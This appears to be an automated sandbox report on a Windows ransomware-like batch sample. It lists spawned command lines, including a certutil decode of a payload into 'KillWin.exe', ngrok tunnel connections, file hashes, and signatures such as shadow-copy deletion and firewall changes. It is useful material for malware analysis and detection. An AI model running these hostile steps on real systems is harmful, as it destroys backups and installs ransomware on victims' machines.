C:\Windows\system32\timeout.exe

timeout /t 5

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\system32\wscript.exe

wscript "0.vbs"

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\System32\RUNDLL32.EXE

"C:\Windows\System32\RUNDLL32.EXE" user32.dll, UpdatePerUserSystemParameters

C:\Windows\system32\timeout.exe

timeout /t 4

C:\Windows\system32\certutil.exe

certutil -decode "Data.lp" "KillWin.exe"

C:\Windows\system32\wscript.exe

wscript "m.vbs"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --field-trial-handle=5688,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=5692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6564,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6556 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6524,i,15142778360084620907,1763097090506261076,262144 --variations-seed-version --mojo-platform-channel-handle=6324 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x470 0x49c

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 ca82-152-231-188-225.ngrok-free.app udp
US 8.8.8.8:53 ca82-152-231-188-225.ngrok-free.app udp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 ca82-152-231-188-225.ngrok-free.app udp
DE 18.192.31.165:443 ca82-152-231-188-225.ngrok-free.app tcp
DE 18.192.31.165:443 ca82-152-231-188-225.ngrok-free.app tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 cdn.ngrok.com udp
US 8.8.8.8:53 cdn.ngrok.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
DE 3.125.102.39:443 cdn.ngrok.com tcp
US 23.200.189.225:443 www.microsoft.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
US 2.20.12.101:443 bzib.nelreports.net tcp
DE 18.192.31.165:443 cdn.ngrok.com tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 56.104.245.94.in-addr.arpa udp
US 8.8.8.8:53 165.31.192.18.in-addr.arpa udp
US 8.8.8.8:53 39.102.125.3.in-addr.arpa udp
US 8.8.8.8:53 225.189.200.23.in-addr.arpa udp
US 8.8.8.8:53 101.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.244.186:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.244.186:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 186.244.140.51.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.253.64:443 edgestatic.azureedge.net tcp
US 13.107.253.64:443 edgestatic.azureedge.net tcp
US 13.107.253.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.253.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 64.253.107.13.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
BE 2.17.107.112:443 www.bing.com tcp
US 8.8.8.8:53 112.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
DE 18.192.31.165:443 cdn.ngrok.com tcp
DE 18.192.31.165:443 cdn.ngrok.com tcp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
BE 2.17.107.112:443 www.bing.com tcp
DE 18.192.31.165:443 cdn.ngrok.com tcp
DE 18.192.31.165:443 cdn.ngrok.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
BE 2.17.107.128:443 www.bing.com udp
US 8.8.8.8:53 128.107.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 b82d5c0a5deeca2c89b8fd16911c11f1
SHA1 99fea8c7d2781d6b13886ce8f50b1f4b9beac961
SHA256 7e2f4567e9674aa2e0e170a42ae7011a295dbce5f449cf7cf778e3ff732bd9e5
SHA512 1c3646bf08ceeefcd4d22d882803083da2049ac0a2ba935c94ab6a7bf0642dddf855d684f89e17e96544324699416c25e191ace1cd7b3c52853c8c2c69c8c185

C:\Users\Admin\AppData\Local\Temp\Image.bin

MD5 eb05f382514e1a62572f9afd06a0a50d
SHA1 86a601e6b8a6e0dee089a66707a9a1d80bd33ba5
SHA256 24c3df9a48a7d1abd01b3a608505a33a3a2d3d907c7b6dad79c0f0da01125ab9
SHA512 2b46fcbcd1a35e09c22f3230b690783121fbdd504e4f3f34d3e1753db63d6720e5c6d752bad2d2015326e165b08b13d4c4ed7611cdaaad0e1f52a357e270a79f

C:\Users\Admin\AppData\Local\Temp\0.vbs

MD5 5b2f4b19baac5325cbeae4d8024d064c
SHA1 4f109afc12cec097f003f1723c1da56940f69b8f
SHA256 43464f239bf395e90405c7579f7380d06a0b581bbd0a8ca836b05a82808be78e
SHA512 7deb4fea0601cd364bda06c74d6a5d52ffb3d16935d8552c91ebca7d790f6566c64746ff58e61936356758f4b93d91931d477c363ccc4af9a133e0456f9fb40b

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 84e76c4333a2e08f687b8cd18eed901e
SHA1 723033d08ec213f2fc8358b202e92734a873a117
SHA256 15a7094f601c041e396c09c13148669121b3740d296003f7428cfe3e0c4bc030
SHA512 f0d6b8fd00ee2f133cb726b5726cc915dfad60a8149726e472b90b33fc31e9415215209eddffff0c86645b4e4e2c108041a91b7fafebe1958c89149e166a56e7

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 ce4b7fda2db2db095ebd6728b8878082
SHA1 41a7af0010d162f0971dadae6506d33836a2e66b
SHA256 503f44c1d079ebd27f4ff70acc01d09b18836258b6a35ba68ec4087521dc3afe
SHA512 f4d0fd7eea4824b6e62505940dd0a348545111723b432da572543699e62243d1c0cf087b49fbf3622fa31635e61f0a538e64a06e8987e6c9c1984b5db35c092f

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 3326820872eea8ff3eb2fdca6920a0d6
SHA1 6cb64b5dc48b4e29b2f40f68250697964881887a
SHA256 c8b13e87732c28675e6830404a613a7bce8e1570e81e46bdc62f2e6198c56432
SHA512 c40975c7e2b9a1be6af440b3059b20acc45dbd2d8260f496c86e79a7973a3a7f2c3ea3ee045f62f3c20f7dd56c44eec5ab25d04725cfb51e4e53f32630c2640f

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 267373976517f497713da6526f2a5919
SHA1 7b0384a5cbc5ed3b6dd5bf6f35a69261ad89708c
SHA256 7595c53f65129cce5d83227f7d4175d3340aeb31ce13f04fa40fde5c695f921a
SHA512 0e4dd83d0bd2a3d7eb134242a4f913aa97547e69fcf0989f1c55446cd62673c3cc91c2868f77cf0f0dd3048e8c7c051fc03b1cb56f489f54a75070d71a9e1c75

C:\Users\Admin\AppData\Local\Temp\Admin.log

MD5 ff919ef1b4964694a371969a0a8fdc03
SHA1 794b2d5a72d9116001deb47cfdc1947469494d6b
SHA256 fafe968b635719a9e69e81e3bfe5a9021c1b044991508db15df67e125c9bcf76
SHA512 d6458bfe62a41eee2a4e27567942b091f7373d1d70ad11796a0ce4b75764fe38870a9bbd86a886dc111ef21d9b8ecdaec086e58ff9fa6ef1d40830771c2204bd

C:\Users\Admin\AppData\Local\Temp\Data.lp

MD5 c63727e7d32cd53e644d8ab3435778fa
SHA1 4f187b6d1a0839ffff7bcc69368b40ca007067b3
SHA256 91d5604845d13992f916f56c2301cf866973520ef647a5d7073cdddc0bca3d00
SHA512 278aa953b1578c2b7eebcd6d4dc3241a3e8862ce1ebafb2e37ec3715f2f92833f147c41227052f8ec6f06ae35d71f810913b3c28dd1675ee5e473559b3e85bc7

C:\Users\Admin\AppData\Local\Temp\KillWin.exe

MD5 3713a4dfdfa399b20561aa8bcbea1b25
SHA1 8109cb8e9e9c00fba74d456c1756799c72072989
SHA256 8e4e731640114f96219d4aa6ce2416c2f1db7e75834cdca91c380de6b0eebbaa
SHA512 a34244e4622648dc19f2efa001bf461cec7794bb7050fadacd5369272d83db87fef711afbb5a108b7665304430a419ee7fdf09c2e8155f496eba1a321142b090

C:\Users\Admin\AppData\Local\Temp\22211_1823.bat

MD5 71f2ece5d6de26f528ff0e1c9382f1c9
SHA1 12b4fe9e4f1d4e0ea494393282baeb58f5991c8e
SHA256 648b31ac461f2539e111298e9d5f8e154ed8852a4f8c57cceec17504da8cdb01
SHA512 0236aa82c44f9cdc7230d2b46c910c794820202e697031c893ed8502883f310bc202beee7d4a502f5508c8f6c320f9479e48be30f24f344624a0224a1f549c56

C:\Users\Admin\AppData\Local\Temp\m.vbs

MD5 cbaa7c6cb3c383b11dd691b316f2a91b
SHA1 0f2d66cea7cc24e0dda9972e05a7b236a9bcbc9e
SHA256 5f1ffcde4ee668c3350fdd9730df67adc35c704342ac2224924069c9bae2be95
SHA512 fe74a8ccd7875e7bf9588d386fd886810dc0edd01216bf5a886add985fcbb813296a606ec83028a90d30b4df348125827300a98f2ec6081a5d981d09316a44f9

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-26 08:19

Reported

2024-06-26 08:22

Platform

win7-20240508-en

Max time kernel

117s

Max time network

119s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\22.bat"

Signatures

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\A: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\cmd.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\cmd.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Wallpaper.jpeg" C:\Windows\system32\wscript.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies Control Panel

evasion
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Control Panel\Desktop C:\Windows\system32\wscript.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 4c00310000000000a858d38210204c6f63616c00380008000400efbea8588181a858d3822a000000fe0100000000020000000000000000000000000000004c006f00630061006c00000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 = 5200310000000000a8588181122041707044617461003c0008000400efbea8588181a85881812a000000eb0100000000020000000000000000000000000000004100700070004400610074006100000016000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\NodeSlot = "1" C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 4c00310000000000a8587084100041646d696e00380008000400efbea8588181a85870842a00000030000000000004000000000000000000000000000000410064006d0069006e00000014000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4a00310000000000da588242102054656d700000360008000400efbea8588181da5882422a000000ff010000000002000000000000000000000000000000540065006d007000000014000000 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 7400310000000000a85881811100557365727300600008000400efbeee3a851aa85881812a000000e601000000000100000000000000000036000000000055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Generic" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Windows\explorer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2036 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\attrib.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2180 N/A C:\Windows\system32\cmd.exe C:\Windows\explorer.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2216 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\ipconfig.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 2700 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 1540 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 2548 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 1644 wrote to memory of 1084 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
